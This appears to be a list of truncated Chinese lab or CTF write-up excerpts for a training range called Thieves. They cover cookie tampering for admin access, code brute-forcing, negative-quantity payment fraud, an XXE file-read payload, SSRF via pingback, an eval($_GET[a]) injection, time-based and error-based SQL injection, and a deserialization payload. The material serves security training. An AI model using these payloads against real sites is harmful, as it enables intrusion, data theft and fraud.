Thieves 越权漏洞 解题笔记
登录网站先注册用户权限普通用户查看cookie发现admin修改为1刷新页面发现已经是管理员了,但是无法登录后台,再修改shenfen = 1就可以进入后台了得到flag
Thieves 密码找回漏洞 解题笔记
先抓包验证码为4位,直接使用burp爆破当出现不同的length说明爆破成功然后网站就炸了,所以我这边本地搭建再做了测试使用刚刚修改的密码登录后台成功拿到后台
Thieves 在线支付漏洞 解题笔记
进入靶场,先注册然后找个商品将数量改为负数,付款报错但是,返回账户发现钱到账了岂不是美滋滋反向购物,牢底坐穿
Thieves XXE 实体注入 解题笔记
一上来什么玩意一大堆代码逐行分析,发现没有做过滤啊,有搞头遇事不决先抓包啊修改post并拼接以下代码<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpStudy/PHP
Thieves SSRF>漏洞和利用 解题笔记
登录靶场发现看到Post先抓包放入Repeater中测试加入以下代码,测试端口连通性<?xml version="1.0" encoding="utf-8"?> <methodCall> <methodName>pingback.ping</methodName> &nbs
Thieves CSRF跨站伪造请求 解题笔记
http://117.41.229.122:8010/csrf/uploads/dede/login.php用户名admin 密码admin123先登录sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\";eval($_GET[a]);die();//尝试构建一个小马使用phpinfo()测试连通发现可
Thieves 延时注入 解题笔记
第一题:尝试'报错,存在注入点页面延迟594毫秒尝试延时 ?id=1' and sleep(3)%23页面延迟5秒使用?id=1' and sleep(if((length(database())=8),0,3))%23执行无延迟,说明 database() = 8尝试盲注?id=1' and sleep(if(ascii(substr(database(),1,1
Thieves 显错注入 解题笔记
第一题首先?id=1显示网页,发现'1',所以首先要闭合引号http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1' and 1=1发现,前面闭合了,后面没有闭合,所以使用--+来闭合后面的引号然后开始注入and 1=2测试注入点页面报错,发现注入点,猜字段数http://120.203.13.
Thieves 后端开发基础PHP—Php 表单验证 解题笔记
Thieves 反序列化漏洞 解题笔记
首先登陆网站http://120.203.13.75:8123/uns/index.php?source=审计代码发现此处可以利用get传参然后发现当cookie传参满足md5($m) === $h时,才会进行序列化然后构造序列化语句a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";